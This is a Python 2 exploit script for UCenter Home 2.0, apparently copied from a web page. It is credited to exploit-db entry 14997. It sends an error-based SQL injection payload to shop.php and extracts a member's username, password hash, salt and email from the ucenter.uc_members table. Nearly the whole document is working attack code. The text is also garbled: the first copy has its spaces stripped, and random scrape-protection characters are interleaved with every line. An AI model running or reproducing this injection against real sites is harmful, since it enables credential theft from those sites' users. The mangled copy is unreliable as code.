#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
, g+ E9 `, x: u+ y! r' Z
: u9 J: N- O; o# u3 `! ^1 f( O. L+ U, |& Z6 a( s5 k
#!/usr/bin/env python - K3 w$ a3 r) n- T7 h' k3 c+ D0 p7 G
) N) n, C; D0 C3 H* \0 limport sys
6 j+ T/ N9 a8 b# {: t! c8 ]import urllib2
' g, A' U8 r) @. L) j3 |0 g' Iimport re
' ?5 ]5 g5 t" U% ?
& V1 ]" g+ h, Z/ c% ldef info():
+ w) o* ^9 S' b2 p& j6 Y print 'From:http://www.exploit-db.com/exploits/14997/' 6 d! D4 Z" A, Z$ k9 d
print 'http://www.hake.cc/Web_loudong/'
( ~1 ^1 }; i% Y$ T( c6 E4 Z$ b print 'changed:qiaoy' * |8 S& o1 P% |( n7 X; g
print 'exp:' 2 D* L/ Z9 r1 U0 l! i
print ' ./UCenter_Home_2.0.py site'
4 {& j9 O0 E1 @+ v! ]) K/ S. X/ A2 { 2 K7 ]! d' N7 N( T: b3 n5 ^
def main():
, H8 {* o9 S7 i4 b6 d if len(sys.argv) != 2: ; R; u3 m! S+ ^! J! D' q
info() ! C8 K# B H' \, {0 S: y, f
else:
4 @: J3 T0 M7 a6 G site = sys.argv[1] * H3 ^* `% q' t3 w9 h+ |; J! ?0 V
if site[0:7] == 'http://':
- A8 @5 q9 Y8 f p/ {) q2 B, b sitesite =site 6 R o9 B- G' h1 {' |7 _2 s
elif site[0:8] == 'https://': 9 p6 {! `+ F' h @' z1 [
sitesite = site
. q8 D8 j3 h: L8 {7 i' c else:
3 d$ q* }* ^/ h z+ x) Y+ S# g3 J2 W0 _ site = 'http://'+site ! h1 k( a" {. ?5 x# N0 K3 {
try:
3 C0 f/ l0 w' X1 p url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'
" T' m$ B" M. j. R8 W7 N Value = urllib2.urlopen(url).read() . L7 H+ ^8 u1 M+ b7 l
Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]
: O: J U. S1 L hacked = Msg.split(':') 9 ?( L( c4 y: n! F* `
print 'Name: '+hacked[1]
0 Q" l( h$ g# {; |0 T/ V& R* } print 'Passwd: '+hacked[2]
6 ?8 x9 Q j, F! ]" X print 'salt: '+hacked[3] + P% C+ K5 O1 b' Q+ c5 x% j; L1 ~
print 'email: '+hacked[4] ( C: J4 I/ x P9 n+ @
except:
1 C* D. P, n: J7 H: U6 Y print 'Sorry,I can\'t work............'
3 V6 s, o7 E" _) w- ~ . G% S2 I& M4 P: W' t) H
if __name__ == '__main__': 8 [: P: K' V- f/ } {5 S
main() |